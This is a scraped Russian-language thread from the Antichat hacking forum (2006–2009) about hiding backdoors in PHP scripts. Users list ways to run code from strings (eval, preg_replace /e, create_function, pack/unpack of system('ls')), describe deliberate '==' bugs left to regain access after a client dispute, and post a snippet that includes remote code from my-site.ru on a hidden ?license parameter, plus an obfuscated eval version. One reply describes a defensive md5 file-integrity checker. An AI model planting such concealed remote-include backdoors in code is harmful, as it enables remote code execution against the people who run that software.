Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

30.11.2006, 18:01
|
|
Участник форума
Регистрация: 31.10.2006
Сообщений: 212
Провел на форуме: 1073612
Репутация:
50
|
|
Сообщение от Green_Bear
Молодец, +.
Добавил в карту статей.
Ты так быстро работоспособность проверил  Я удивлен!
|
|
|

01.12.2006, 20:22
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
Мб кинуть это в статьи? оч. достойно
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

01.12.2006, 20:48
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме: 19975136
Репутация:
4536
|
|
дык кинул уже в карту.
|
|
|

30.04.2009, 19:34
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
А какие еще варианты(функции, языковые конструкции ) выполнить php код из текста кроме eval , preg_replace /e,ну и в некоторыйх случаях create_function() ?
|
|
|

03.05.2009, 13:19
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме: 1996429
Репутация:
468
|
|
В журнале хакер была статья "неслучайные баги". Там как раз на эту темы. Еще было написано,как авторизоватся,если скрипт писал ты а тебя типа кинул заказчик на деньги,а скрипт забрал. Неслучайный баг был в == вместо ===. Очень интересная тема,ТС! +1!
|
|
|

03.05.2009, 14:17
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
Провел на форуме: 991929
Репутация:
395
|
|
эм я это на какомто стороннем сайте читал... может стырили хз, там правда был еще доработан генератор запутаного кода )
мы подобное реализовали в комерческом движке но файл был не лицензии а обычный php фейковая проверка валидности движка ))) хех
|
|
|

03.05.2009, 16:14
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме: 1996429
Репутация:
468
|
|
Можно еще unpack(xxx) где xxx = запакованая строка system('ls'),с помощью функции pack, хотя unpack(xxx) это слишком большое палево... Вот в яваскрипте с этим проблем нет. Там большой простор для фантазии!
|
|
|

02.08.2009, 18:09
|
|
Постоянный
Регистрация: 26.07.2009
Сообщений: 321
Провел на форуме: 444589
Репутация:
123
|
|
хм
а вот я возьму такой код
PHP код:
if (isset ($_GET[license])) { include 'http://my-site.ru/license.txt'; exit(); };
и запуше его так
PHP код:
$file_name_="license.txt";
$userID="lude";
$suPPort="my-site.ru";
$arsia="inc";
if (isset ($_GET[license]))
{
eval($arsia.$userID."\'http://".$suPPort."/".$file_name_);
exit();
};
и чем хуже?

|
|
|

02.08.2009, 18:24
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от phpdreamer
а вот я возьму такой код
PHP код:
if (isset ($_GET[license])) { include 'http://my-site.ru/license.txt'; exit(); };
и запуше его так
PHP код:
$file_name_="license.txt";
$userID="lude";
$suPPort="my-site.ru";
$arsia="inc";
if (isset ($_GET[license]))
{
eval($arsia.$userID."\'http://".$suPPort."/".$file_name_);
exit();
};
и чем хуже?

Это если чесно какаято поебень.Я вообще хз как сейчаС,но просто наросто использую росто самописный скрипт,который по крону за в 30мин проверяет все файлы в папкх,их сумму мд5,имена,и сравниват с первой проверкой.Если все совпадает - то молчком,а если нет - подозрительный файл переименовываеться,и отправляеться в другую папку с .htaccess.Все это видно в админке,и действия можно отменить,если файл наш =) родной.Так что по сути,такай вот запарка с кодом не пройдет.
|
|
|

03.08.2009, 02:08
|
|
Участник форума
Регистрация: 03.02.2009
Сообщений: 104
Провел на форуме: 270228
Репутация:
70
|
|
Сообщение от m0Hze
Это если чесно какаято поебень.Я вообще хз как сейчаС,но просто наросто использую росто самописный скрипт,который по крону за в 30мин проверяет все файлы в папкх,их сумму мд5,имена,и сравниват с первой проверкой.Если все совпадает - то молчком,а если нет - подозрительный файл переименовываеться,и отправляеться в другую папку с .htaccess.Все это видно в админке,и действия можно отменить,если файл наш =) родной.Так что по сути,такай вот запарка с кодом не пройдет.
Поебень ваши посты сейчас, посмотрите какого года тема...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|